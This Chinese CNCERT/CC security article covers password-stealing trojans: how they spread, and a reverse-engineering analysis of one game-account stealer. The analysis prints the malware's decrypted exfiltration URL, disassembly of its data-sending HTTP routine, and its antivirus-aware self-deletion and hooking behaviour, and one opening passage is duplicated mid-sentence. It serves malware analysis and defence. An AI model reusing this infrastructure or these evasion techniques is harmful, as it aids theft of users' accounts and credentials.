17攻击性分析和防范措施国家计算机网络应急技术处理协调中心(CNCERT/CC) 崔 翔 陈明奇窃密型木马近两年,网络犯罪趋向于能够给攻击者带来直接或间接的经济利益,不同于此前以追求纯技术为目的。
随着黑客技术和黑客工具的普及,网络犯罪的技术门槛降低,许多不法分子利用这些技术进行非法牟利。
其中,窃密型木马(Trojan-PSW)是表现尤为突出且对用户影响很大的一类安全威胁。
窃密型木马通过各种各样的方式植入用户电脑,从中搜索自己需要的资料或者直接截取用户输入的信息,记录后通过某种方式发送给攻击者,攻击者利用盗取的资料非法牟利。
窃密型木马使个人用户面临隐私信息泄漏和经济损失的危险,也给银行、证券、金融、电子商务等带来安全隐患,所以有必要重视这类木马的原理和防范措施。
如何植入用户主机相对于蠕虫来说,木马缺乏主动传播性,木马的传播行为一般都有人参与,而且经常利用“社会工程学”的技巧,窃密型木马也不例外,其主要传播方式和途径如下: 1. 利用系统漏洞直接传播用户电脑本身存在漏洞,如操作系统漏洞或者是IE浏览器漏洞等,都可以被不法分子利用,直接将木马程序复制或者下载到用户电脑并运行。
2. 利用蠕虫或僵尸网络传播 自2001年红色代码蠕虫出现以后,很多蠕虫感染用户主机后,会从某些服务器下载木马,对用户主机实施进一步控制。
同样,感染僵尸程序的主机下载木马运行也很常见。
3. 利用即时聊天工具诱惑传播木马通过发送一段具有诱惑性内容的消息,附带一个链接,诱使用户点击访问。
一旦访问,就会自动将木马程序下载到用户机器并运行。
4. 利用网站、论坛欺骗传播木马程序所有者通常会在一些音乐网站或者知名论坛发布一些虚假消息,欺骗用户说可以获取某种利益,引诱用户使用一些小工具或者访问恶意网站地址,这其中就安放了木马程序,等待用户下载运行。
5. 利用电子邮件传播木马所有者发送附带木马程序的电子邮件,邮件主题通常比较吸引人,诱使用户浏览附件,从而感染木马。
对一款盗号木马的详细分析一、主程序流程分析:主程序名:ctfmon.exe(仿冒微软输入法配置程序)壳:无壳编写语言:汇编(估计) 1. 用GetLogicalDriveStringsA API获得所有系统盘符存放到一个字符串; 2. 读取自身文件尾部的0x1C4字节数据,并根据最后4字节的DWORD值,调用NEW函一、主程序流程分析:主程序名:ctfmon.exe(仿冒微软输入法配置程序)壳:无壳编写语言:汇编(估计)1. 用GetLogicalDriveStringsA API获得所有系统盘符存放到一个字符串;2. 读取自身文件尾部的0x1C4字节数据,并根据最后4字节的DWORD值,调用NEW函数申请内存(为0x2A00大小);3. 从自身文件距离尾部(0x1C4+0x2A00)字节处,读取0x2A00字节数据,存储到上面NEW出来的内存中;4. 关闭游戏主程序******nest.exe;5. 根据注册表项:SOFTWARE\\snda\\dn和Software\Microsoft\Windows\ShellNoRoam\MUICache找到游戏所在目录生成gamewidget.dll和midimap.dll,dll,内容为第3步中的数据写2001次,再加上文件尾部的0x1C4字节数据,共20.5 MB (21,515,204 字节)(太大了-.-)。
(因为我没有安装这个游戏,所以也没有这些注册表项目,实际当中我自己建了一个SOFTWARE\\snda\\dn注册表项,随便给了一个路径)6. 根据第1点里面得到的所有系统盘符字符串,用SearchTreeForFile API(盘符多,硬盘大的时候好慢啊),查找Dnlauncher.exe程序,找到了之后在该目录下创建gamewidget.dll和midimap.dll,因为没装游戏,我又伪造了一个Dnlauncher.exe(-.-)7. 本程序实现的自删除,会因机器是否安装有瑞星而有所不同。
机器没有安装瑞星时是把自己移动到程序所在盘符的RECYCLER文件夹中,并重命名成一个GetTickCount得到的数字+.tmp后缀名的文件。
在XP系统上这个文件比桌面上的回收站目录高一级,所以点击桌面的回收站,里面会看不到这个文件。
机器安装了瑞星则不做上述处理。
最后会将此文件设为下次重启电脑时删除。
二、生成的DLL模块流程分析:1. 上面所说的gamewidget.dll和midimap.dll,dll内容都是一样,虽然文件很大(重复写了太多次的结果),但内容还是用了UPX加壳了(UPX 0.80 - 1.24 DLL)。
ESP定律简单脱壳,PEID再查一下为Microsoft Visual C++ 6.0 DLL。
2. 该dll首先将系统目录(XP系统为\WINDOWS\system32\)下的midimap.dll 文件复制一份为lqmidimap.dll放到同一目录下,然后创建一个线程,接下来的工作都在此线程中完成。
3. 进入线程后首先会创建一个互斥体对象防止线程多次运行,接下来比较主模块的模块名是否是“******Nest.exe”。
如果不是则退出,如果是继续以下步骤。
4. 读取自身文件最后0x1C4字节(这里就要注意脱壳后的文件最后的字节和脱壳前已经不一样了,为了调试方便可以把脱壳前文件的尾部数据添加到脱壳后dll中),进行几步相套的算法变换,将最后的0x1C4字节解密出来,解密出来的数据如下:10004C48 68 74 74 70 3A 2F 2F 68 61 68 61 35 2E 68 61 6F http://haha5.hao 10004C58 72 65 6E 36 37 38 2E 63 6F 6D 3A 38 30 31 31 2F :8011/ 10004C68 66 65 6E 2F 71 6C 6E 62 32 30 2F 61 73 64 66 61 fen/qlnb20/asdfa 10004C78 67 61 73 61 73 64 66 67 7A 78 63 76 2E 61 73 70 gasasdfgzxcv.asp 10004C88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004C98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004CA8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004CB8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004CC8 68 74 74 70 3A 2F 2F 68 61 68 61 35 2E 68 61 6F http://haha5.hao 10004CD8 72 65 6E 36 37 38 2E 63 6F 6D 3A 38 30 31 31 2F :8011/10004CE8 66 65 6E 2F 71 6C 6E 62 32 30 2F 61 73 64 66 61 fen/qlnb20/asdfa 10004CF8 67 61 73 61 73 64 66 67 7A 78 63 76 2E 61 73 70 gasasdfgzxcv.asp 10004D08 68 74 74 70 3A 2F 2F 68 61 68 61 35 2E 68 61 6F ttp://haha5.hao 10004D18 72 65 6E 36 37 38 2E 63 6F 6D 3A 38 30 31 31 2F :8011/ 10004D28 66 65 6E 2F 71 6C 6E 62 32 30 2F 61 73 64 66 61 fen/qlnb20/asdfa 10004D38 67 61 73 61 73 64 66 67 7A 78 63 76 2E 61 00 00 gasasdfgzxcv.a.. 10004D48 68 74 74 70 3A 2F 2F 68 61 68 61 35 2E 68 61 6F http://haha5.hao 10004D58 72 65 6E 36 37 38 2E 63 6F 6D 3A 38 30 31 31 2F :8011/ 10004D68 66 65 6E 2F 71 6C 6E 62 32 30 2F 61 73 64 66 61 fen/qlnb20/asdfa 10004D78 67 61 73 61 73 64 66 67 7A 78 63 76 2E 61 73 70 gasasdfgzxcv.asp 10004D88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004D98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004DA8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004DB8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004DC8 78 78 73 73 00 00 00 00 00 00 00 00 00 00 00 00 xxss............ 10004DD8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 10004DE8 61 62 63 64 00 00 00 00 00 00 00 00 00 00 00 00 abcd............ 10004DF8 31 37 34 30 39 34 38 38 00 00 00 00 00 00 00 00 17409488........ 10004E08 00 2A 00 00 .*..然后将:8011/fen/qlnb20/asdfagasasdfgzxcv.asp最后的asdfagasasdfgzxcv.asp替换为MIBAO.asp即为::8011/fen/qlnb20/MIBAO.ASP(难道是伪造密保页面吗?-.-)5. 接下来HOOK了"user32.dll"中的MessageBoxTimeoutW"函数,至于HOOK的目的,干了哪些事就不知道了。
6. 接下来,查找模块gwCore.dll,HOOK了该dll中一系列位置,IDA中看这一段看的云里雾里。
查找SDOA4ClientCom.dll模块,进行一系列HOOK。
7. 从LZGSERVER.ini文件中拿到SERVER项内容,使用URLDownloadToFileA函数下载网页/sndalist/sndalist_new.xml保存到本机TEMP目录下,文件名为SerList.xml,进行一番查找比较。
之后线程结束。
三、后续分析:分析到这里貌似也没什么再好分析的了,可能大家没看到木马作恶的过程有点失望,是的,我也没看到,因为他的关键功能都是在HOOK之后所跳转到的代码里面完成的,我大部分都是在IDA里面静态分析的,顺着流程走下来就是这样一个过程。
为了不让大家太失望,也为了让自己不至于觉得太没成就感,我又回头看了一下逆向分析的过程,结合导入表中的函数来看了下,该木马至少有屏幕截取和网络发送数据的嫌疑。
那么就再稍微跟踪一下这两个方面吧。
1. 网络发包分析:还记得我们在dll分析的第4步中,得到的那个网址吧:8011/fen/qlnb20/MIBAO.ASP用IDA看一下,什么地方还引用了这个字符串,还真的有所收获:1.JPG下载此附件需要消耗2Kx,下载中会自动扣除。
把sub_10002B9E这个CALL跟进去,会发现里面有HTTP协议的数据发送和接收操作。
UPX0:10002DB7 push eaxUPX0:10002DB8 push offset aPostSHttp1_1Ac ; "POST %s HTTP/1.1\r\nAccept: text/plain, *"...UPX0:10002DBD push ebx ; DestUPX0:10002DBE call sprintfUPX0:10002DC4 add esp, 54hUPX0:10002DC7 lea eax, [ebp+Dest]……………………………………中间多余代码已删减………………………………………………UPX0:10002E2C push offset aQlmmsg ; "qlmmsg"UPX0:10002E31 push eaxUPX0:10002E32 push offset aGetSHt ; "GET %s HT"UPX0:10002E37 push ebx ; DestUPX0:10002E38 call sprintfUPX0:10002E3E push ebx ; StrUPX0:10002E3F call strlenUPX0:10002E44 add esp, 18hUPX0:10002E47 mov esi, eaxUPX0:10002E49UPX0:10002E49 loc_10002E49: ; CODE XREF: sub_10002B9E+278jUPX0:10002E49 xor edi, ediUPX0:10002E4B push edi ; flagsUPX0:10002E4C push esi ; lenUPX0:10002E4D push ebx ; bufUPX0:10002E4E push [ebp+s] ; sUPX0:10002E51 call send ; 发送数据……………………………………中间多余代码已删减………………………………………………UPX0:10002E86 push edi ; flagsUPX0:10002E87 push esi ; lenUPX0:10002E88 push eax ; bufUPX0:10002E89 push [ebp+s] ; sUPX0:10002E8C call recv ; 接收数据UPX0:10002E92 cmp eax, 0FFFFFFFFhUPX0:10002E95 jz short loc_10002EDBUPX0:10002E97 mov esi, offset aHttp1_1400 ; "HTTP/1.1 400"2. 截图过程分析:在我们第二阶段分析dll的时候其中第6步提到了该dll HOOK了gwCore.dll。